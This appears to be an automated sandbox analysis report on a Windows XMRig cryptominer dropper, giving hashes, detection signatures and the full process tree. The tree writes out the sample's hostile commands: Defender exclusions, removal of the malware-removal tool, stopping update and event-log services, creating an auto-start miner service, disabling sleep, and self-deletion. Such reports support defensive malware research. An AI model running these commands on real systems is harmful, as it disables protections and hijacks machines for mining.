Analysis
-
max time kernel
120s -
max time network
76s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 16:20
Static task
static1
Behavioral task
behavioral1
Sample
65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe
Resource
win7-20240729-en
General
-
Target
65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe
-
Size
5.6MB
-
MD5
90bd71a10f54f757c5d4e41f35ab7a6a
-
SHA1
a1ea19f081c062212029546ac161a412abc8ab50
-
SHA256
65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f
-
SHA512
5422b13f7138f4a6ce9d2fc0ed87699899294afcf17f51f7d02f9828a184b46660e66332e1fdded8dcd182cb14c5bba8eb47dcd630844a38a5dd6f833490f906
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/HV:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgp
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/1076-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1076-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1076-34-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1076-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1076-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1076-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1076-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1076-41-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2680 powershell.exe 324 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
pid Process 1928 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 472 Process not Found 1568 fqwofdtexigy.exe -
Loads dropped DLL 1 IoCs
pid Process 472 Process not Found -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3060 powercfg.exe 2368 powercfg.exe 1616 powercfg.exe 2808 powercfg.exe 1772 powercfg.exe 2252 powercfg.exe 1904 powercfg.exe 2396 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1568 set thread context of 2212 1568 fqwofdtexigy.exe 85 PID 1568 set thread context of 1076 1568 fqwofdtexigy.exe 90 -
resource yara_rule behavioral1/memory/1076-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-34-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-40-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1076-41-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2836 sc.exe 624 sc.exe 1632 sc.exe 480 sc.exe 1552 sc.exe 2552 sc.exe 2992 sc.exe 2316 sc.exe 2880 sc.exe 2540 sc.exe 1680 sc.exe 2080 sc.exe 292 sc.exe 2572 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 504003718d54db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2680 powershell.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 2668 65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe 1568 fqwofdtexigy.exe 324 powershell.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1568 fqwofdtexigy.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe 1076 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2680 powershell.exe Token: SeShutdownPrivilege 2808 powercfg.exe Token: SeShutdownPrivilege 1616 powercfg.exe Token: SeShutdownPrivilege 1772 powercfg.exe Token: SeShutdownPrivilege 2252 powercfg.exe Token: SeDebugPrivilege 324 powershell.exe Token: SeShutdownPrivilege 2368 powercfg.exe Token: SeShutdownPrivilege 2396 powercfg.exe Token: SeShutdownPrivilege 1904 powercfg.exe Token: SeShutdownPrivilege 3060 powercfg.exe Token: SeLockMemoryPrivilege 1076 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2624 wrote to memory of 2524 2624 cmd.exe 39 PID 2624 wrote to memory of 2524 2624 cmd.exe 39 PID 2624 wrote to memory of 2524 2624 cmd.exe 39 PID 1928 wrote to memory of 2344 1928 cmd.exe 64 PID 1928 wrote to memory of 2344 1928 cmd.exe 64 PID 1928 wrote to memory of 2344 1928 cmd.exe 64 PID 532 wrote to memory of 1828 532 cmd.exe 73 PID 532 wrote to memory of 1828 532 cmd.exe 73 PID 532 wrote to memory of 1828 532 cmd.exe 73 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 2212 1568 fqwofdtexigy.exe 85 PID 1568 wrote to memory of 1076 1568 fqwofdtexigy.exe 90 PID 1568 wrote to memory of 1076 1568 fqwofdtexigy.exe 90 PID 1568 wrote to memory of 1076 1568 fqwofdtexigy.exe 90 PID 1568 wrote to memory of 1076 1568 fqwofdtexigy.exe 90 PID 1568 wrote to memory of 1076 1568 fqwofdtexigy.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe"C:\Users\Admin\AppData\Local\Temp\65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2668 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2524
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2552
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2572
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2540
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2316
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2992
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:2836
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:2880
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:624
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:1632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\65a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2344
-
-
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1828
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:480
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1552
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1680
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2080
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:292
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2212
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD590bd71a10f54f757c5d4e41f35ab7a6a
SHA1a1ea19f081c062212029546ac161a412abc8ab50
SHA25665a618f270606007f2075ff95d0bee34fcedc87120dcaa19949c0c044f2c4c3f
SHA5125422b13f7138f4a6ce9d2fc0ed87699899294afcf17f51f7d02f9828a184b46660e66332e1fdded8dcd182cb14c5bba8eb47dcd630844a38a5dd6f833490f906